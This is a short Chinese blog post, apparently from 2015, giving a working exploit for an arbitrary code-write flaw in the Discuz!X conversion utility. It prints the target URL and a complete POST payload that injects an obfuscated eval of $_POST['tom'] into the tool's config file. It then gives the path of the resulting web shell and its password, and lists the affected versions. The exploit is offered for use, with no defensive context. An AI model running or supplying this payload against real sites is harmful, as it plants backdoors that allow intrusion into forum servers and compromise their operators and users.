Discuz!X系列转换工具任意代码写入漏洞 getshell

分类:安全 | 2015-02-10 | 撸过 259 次
1人扯谈

有些论坛 可能路径放在其它目录 没有utility 直接convert等

如果看到 转换程序的 data/ 目录不可写 就不用试了 不成功

http://webshell.cc/utility/convert/index.php?a=config&source=d7.2_x2.0

post提交:

a=config&source=d7.2_x2.0&submit=yes&newconfig%5btarget%5d%5bdbhost%5d=localhost&newconfig%5baaa%0d%0a%0d%0aeval(Chr(101%29.Chr%28118%29.Chr%2897%29.Chr%28108%29.Chr%2840%29.Chr%2834%29.Chr%2836%29.Chr%2895%29.Chr%2880%29.Chr%2879%29.Chr%2883%29.Chr%2884%29.Chr%2891%29.Chr%28116%29.Chr%28111%29.Chr%28109%29.Chr%2893%29.Chr%2859%29.Chr%2834%29.Chr%2841%29.Chr%2859%29%29%3b%2f%2f%5d=localhost&newconfig%5bsource%5d%5bdbuser%5d=root&newconfig%5bsource%5d%5bdbpw%5d=&newconfig%5bsource%5d%5bdbname%5d=discuz&newconfig%5bsource%5d%5btablepre%5d=cdb_&newconfig%5bsource%5d%5bdbcharset%5d=&newconfig%5bsource%5d%5bpconnect%5d=1&newconfig%5btarget%5d%5bdbhost%5d=localhost&newconfig%5btarget%5d%5bdbuser%5d=root&newconfig%5btarget%5d%5bdbpw%5d=&newconfig%5btarget%5d%5bdbname%5d=discuzx&newconfig%5btarget%5d%5btablepre%5d=pre_&newconfig%5btarget%5d%5bdbcharset%5d=&newconfig%5btarget%5d%5bpconnect%5d=1&submit=%b1%a3%b4%e6%b7%fe%ce%f1%c6%f7%c9%e8%d6%c3

http://webshell.cc/utility/convert/data/config.inc.php 密码是tom

经检测:DZ X1.5 2.0 3.1 等均成功GetShell

本站内容均为原创,转载请务必保留署名与链接!
Discuz!X系列转换工具任意代码写入漏洞 getshell:https://www.webshell.cc/4664.html

随机日志